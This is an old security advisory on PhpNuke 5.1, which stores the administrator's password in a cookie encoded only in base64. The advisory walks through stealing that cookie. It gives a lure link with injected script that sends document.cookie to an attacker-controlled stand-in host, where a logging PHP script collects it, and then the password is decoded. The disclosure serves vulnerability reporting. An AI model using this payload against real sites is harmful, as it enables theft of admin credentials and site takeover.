php-nuke.5.1.txt

`PhpNuke Admin password can be stolen !  
by Cabezon Aurélien | [email protected]  
http://www.isecurelabs.com/article.php?sid=229 [FR VERSION] + screen shot  
  
Vulnerable : PhpNuke 5.1  
Other version : not tested  
PostNuke : not tested  
  
[1] Introduction  
  
I have found a way to stole PhpNuke Admin password.  
I use 2 vulnerability.  
  
[2] Description  
  
The first vulnerability is that ADMIN login/passwd are stored in a cookie  
like this :  
  
---snip---  
lang  
english  
isecurelabs.com/  
0  
725504896  
29523774  
551579360  
29450340  
*  
admin  
QWRtaW46TmljZV9Ucnk6DQo=  
isecurelabs.com/  
0  
1451582336  
29456384  
3432929360  
29450340  
*  
---snip---  
  
and i discovered that the Admin password was BASE64 encoded !  
So it is very easy to decode it !  
  
Fore exemple :  
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:  
  
You can verify here : http://www.isecurelabs.com/base64.php  
  
The second vulnerability i use is the "Microsoft IE Cookies Exposure via  
'About:' URLS"  
exposed here : http://www.securiteam.com/windowsntfocus/6I00D1535I.html  
  
Here is the plan :  
  
First create a php script that can gather getenv("QUERY_STRING") in a file.  
  
Then create this kind of link and force the phpnuke administrator to follow  
it :  
  
[a  
href="about://www.nuked-site.com/[script]window.open("http://www.yourwebsite  
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9  
remote root exploit ![/a]  
  
(replace [ & ] by < & >)  
www.nuked-site.com is the site that you want to get cookie.  
www.yourwebsute.com is the site that will recieve the cookie thru the  
cook.php script.  
  
If the nuked site's admin follow this link, he will send to your script his  
cookie with the Base64 encoded password.  
Then you just have to decode it !  
  
That's all !  
  
regards,  
  
  
---  
Cabezon Aurélien | [email protected]  
http://www.iSecureLabs.com | French Security Portal  
  
`